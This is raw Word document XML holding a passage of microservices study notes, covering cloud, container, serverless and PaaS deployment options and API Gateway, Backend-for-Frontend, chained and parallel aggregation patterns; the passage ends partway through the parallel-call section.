        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The deployment of microservices can vary depending on the infrastructure and the needs of the organization. Here are common options for deploying microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5C536"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1. Cloud Platforms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB6B61"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AWS (Amazon Web Services):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67533C02"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elastic Kubernetes Service (EKS)</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Elastic Beanstalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used for orchestrating containerized microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F31F569"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for serverless deployments where each microservice runs as a function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0B16F"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Microsoft Azure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C3C591"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Azure Kubernetes Service (AKS)</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App Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are common choices for containerized or serverless microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F2824"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Google Cloud Platform (GCP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F33A619"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Google Kubernetes Engine (GKE)</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App Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for containerized microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77EFB0"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for serverless deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03330E47"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2. Containerization and Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B77D61"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Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251C5F0"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Microservices are typically packaged in Docker containers. This allows for portability across environments, such as local development, staging, and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66234E8B"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Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738919D6"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most common tool for orchestrating containerized microservices. It handles service discovery, load balancing, scaling, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB123CC"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Kubernetes clusters can be deployed on cloud platforms like AWS (EKS), Azure (AKS), GCP (GKE), or on-premise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB72918"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Docker Swarm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B04B6B"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A simpler alternative to Kubernetes for orchestrating Docker containers, though less feature-rich.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A2F93"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3. On-Premise Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FDCDD"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VMs (Virtual Machines):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698E88C"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Microservices can also be deployed on virtual machines that are either part of on-premise infrastructure or on private clouds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E09AC"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Bare Metal Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265B18D"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In some cases, organizations with high performance or special security needs may opt to deploy microservices on dedicated servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02592C32"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4. Serverless Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32012699"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AWS Lambda, Azure Functions, Google Cloud Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71328A68"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For event-driven applications or microservices that need to scale automatically, serverless options can be considered. Each service or function can scale up or down based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4ABEC"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5. CI/CD Pipelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57744530"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Jenkins, GitLab CI, or GitHub Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F3514"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Continuous Integration/Continuous Deployment (CI/CD) tools can automate the deployment of microservices across different environments, including staging and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF416A8"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Typically, microservices are built and tested through CI/CD pipelines, and once they pass, they are deployed into a Kubernetes cluster or a cloud platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116156E"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6. Service Mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740F41A"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Istio, Linkerd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E16CCD"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A service mesh provides additional functionalities like monitoring, traffic routing, and security for microservices running in a Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017C8C4"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It helps manage the complexity of interactions between microservices by providing observability and routing rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DEE4E"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7. Edge and Hybrid Deployments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BFDC6"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Edge Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B39428"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In some cases, microservices are deployed closer to users, in edge computing locations, to reduce latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47ACB5"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Hybrid Clouds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB95DFE"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Some organizations deploy microservices in both public and private clouds to meet specific compliance or performance needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157A2A1"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lastRenderedPageBreak/>
        <w:t>8. Platform-as-a-Service (PaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06CDAA"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Heroku:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C97B3"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A simpler alternative for deploying microservices that abstracts infrastructure management. It’s often used for smaller projects or early-stage applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824768E"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loud Foundry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E51F32"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A cloud-native platform for deploying microservices. It offers more control than PaaS like Heroku but with less complexity than Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA9382"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334E37CC">
          <v:rect id="_x0000_i2882" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329D3F8"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Common Deployment Strategy for Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5A098"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Dockerizing Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DEB658"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Package each microservice in its own Docker container, ensuring that each microservice has its dependencies bundled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06209E"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Using Kubernetes or Docker Swarm for Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E0E4A"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Use Kubernetes for automatic scaling, rolling updates, and load balancing across microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16EBE5"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I/CD Pipeline for Automation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364A72E"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Implement a CI/CD pipeline to automate the building, testing, and deployment of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E5445"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API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3BCA0"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Use an API Gateway (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Zuul</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Kong</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to route requests to the appropriate microservice and handle concerns like rate limiting, security, and load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A880CA2"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Service Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105979C6"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</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Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamic service discovery, allowing microservices to register and locate each other at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A14904"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5ABF5CFB">
          <v:rect id="_x0000_i2883" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AFF1C"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In summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the deployment of microservices depends on your organization’s infrastructure and requirements. Kubernetes in the cloud is the most common approach, but other options like serverless or PaaS are also viable depending on the use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44295374" w14:textId="1C0A3CA1" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00115965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="60F7C33F">
          <v:rect id="_x0000_i2884" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A6ED6" w14:textId="4481A28D" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="691" w:name="_Toc196308171"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different Aggregation patterns in Microservices</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="691"/>
    </w:p>
    <w:p w14:paraId="6B7291D4" w14:textId="4DF4B695" w:rsidR="00312742" w:rsidRPr="00FA65E9" w:rsidRDefault="00312742" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In microservices architecture, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aggregation patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refer to methods used to combine data from multiple services into a cohesive response, especially in cases where a client needs data from more than one service. These patterns help in handling inter-service communication and can vary in complexity. Here are some of the common aggregation patterns used in microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25515E37"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1. API Gateway Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98228C"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The API Gateway is a server that acts as an entry point for client requests. It forwards the requests to the appropriate backend microservices, aggregates the responses, and sends a unified response back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072220A"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for client-facing applications where different services need to be accessed through a single entry point. It simplifies client interactions with multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590908F"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160676E6"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The client makes a request to the API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C0AD5"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The API Gateway calls different microservices in the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608467A"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Aggregates the responses from these services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56847988"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Returns a unified response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33372DA0"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a system with microservices like User Service, Order Service, and Payment Service, the API Gateway would aggregate responses from all these services and provide the client with a unified response like user order history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE1715"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128772A"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Reduces the complexity for clients, as they only need to interact with a single endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38706DBC"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Centralizes routing and aggregation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E994B"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB9D7A"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Potential bottleneck if the API Gateway becomes overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629512E1"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API Gateway may become a single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C023F79"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1EF0727C">
          <v:rect id="_x0000_i2885" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49B07D"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2. Backend for Frontend (BFF) Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0499B5"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This pattern is an extension of the API Gateway pattern, but it involves having a separate backend for each type of frontend (mobile, web, etc.). Each BFF is responsible for aggregating data for its specific frontend needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89769F"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lastRenderedPageBreak/>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when different frontends (e.g., mobile vs web) require different data or aggregation logic. It helps in avoiding over-fetching or under-fetching of data for each client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A985846"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F5D34"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Each frontend (mobile, web) has its own BFF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2783B0"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The BFF calls microservices and aggregates the necessary data specifically for the frontend it is serving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3AAB6"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The aggregated response is sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8F5A9"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A mobile app and a web app might have different UI needs. A mobile app BFF might aggregate data from User Service, Profile Service, and Order Service differently than the web app BFF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362543D0"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA76039"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Allows customization of responses tailored to each frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623467F"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Avoids unnecessary data fetching and complex responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12543D2C"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BB7BF4"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Adds overhead in maintaining separate backend logic for each frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F179B"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0964CD0D">
          <v:rect id="_x0000_i2886" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77897896"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3. Chained Call Pattern (or Direct Aggregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4062E"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In this pattern, one service makes a direct call to other services sequentially to fetch and aggregate the data before responding to the client. Each service provides a piece of data, and the calling service aggregates them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDFDF0"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when services are tightly coupled and there is a need to aggregate data from different services for a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9390F8"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D3716"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The client sends a request to a service (or API Gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A71B4A"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The service makes calls to other services in a sequence (or parallel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEA6A0"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Each service returns part of the data, which is then aggregated into a single response and sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DAF934"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A User Profile service calls a User Info Service, User Preferences Service, and Order History Service sequentially to compile the complete user profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159718C2"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Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D8E49"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Simple to implement when the service dependencies are limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17686F1F"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Enables fine-grained control over the aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BC19E"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ons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF9D91"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Can introduce latency due to multiple sequential service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CB558"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Failure in one service could disrupt the entire aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95B980"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7B1B2291">
          <v:rect id="_x0000_i2887" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA36BF"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4. Parallel Call Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A130FA8"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Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In this pattern, multiple services are called in parallel to fetch different pieces of data. Once all services respond, their results are aggregated and returned to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C8ACE"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for use cases where data from different microservices can be fetched concurrently, reducing overall latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75D475"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
